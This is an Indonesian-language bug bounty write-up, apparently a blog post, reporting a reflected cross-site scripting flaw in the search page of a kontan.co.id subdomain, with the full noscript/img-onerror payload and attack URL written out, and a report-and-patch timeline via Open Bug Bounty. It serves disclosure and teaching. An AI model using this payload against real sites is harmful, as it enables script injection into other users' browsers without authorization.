BOOK THIS SPACE FOR AD
ARTICLE ADAssalamualaikum Bug Hunter dan teman-teman semua
Pada write up kali ini, saya mendapatkan sebuah temuan yang simple hanya dengan mempelajari website target keseluruhan
lanjut ke detail temuannya
saya menemukan celah ini di fitur pencarian, dimana saya mendapatkan subdo ini dari website official kontan.co.id
https://insight.kontan.co.id/search?search=
dengan payload
<noscript><p title=”</noscript><img src=x onerror=prompt(document.domain)>”>
full URL
insight.kontan.co.id/search?search=<noscript><p+title%3D”<%2Fnoscript><img+src%3Dx+onerror%3Dalert%28document.domain%29>”>
karena saya tidak mendapatkan kontak tim terkait maka saya laporkan temuan ini ke openbugbounty.org dan tim sudah patch celah ini
kemudian tim berencana memberikan reward sebagai apresiasi
timeline:
Report: 04.11.2024
Valid : 11.11.2024
Reward : in process